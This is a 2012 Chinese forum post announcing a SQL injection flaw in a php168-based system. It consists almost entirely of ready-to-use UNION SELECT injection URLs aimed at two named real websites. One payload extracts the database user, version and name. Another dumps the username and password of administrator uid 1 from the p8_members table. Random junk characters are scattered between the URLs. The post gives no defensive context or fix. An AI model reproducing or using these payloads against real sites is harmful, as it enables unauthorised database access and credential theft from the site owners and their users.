找回密码
 立即注册
查看: 3241|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
+ b! h" b* ?" D: g" m) g                                                         
9 d; i7 R9 B+ [2 E; v8 W                                       
6 U" m$ \( r+ {7 E+ t! ?* O1 e1 N7 n" z0 t! o
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
( v! |6 i# X' d5 Y0 o2 [                                                     
. c# t2 C( B* K$ d                                                                  
+ R: B; S4 J5 G) y5 {& ]                                                        # H, G" u0 I! r4 g6 v, U6 n8 D' n7 {
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--2 C* C0 k" V! A7 G( [+ a+ J% R

% S* {/ U# n8 E" K: m. b: _  ~+ j+ Y( L
: g$ s8 y5 ]0 V
                                                            4 k- l, S. F4 U' h' l! N
2 c  K3 C# x2 s- e1 g7 `  w1 _1 @
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
# P0 ^  u" b* i: p6 r4 u) V
* ?& k( [2 X$ J  T4 C1 d; p
' r2 ?, l# U. d# y& I2 b. d2 F# D2 X6 ?( W# R
                                                                    ' }4 I- J& ]- d7 y) H% Z/ q

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表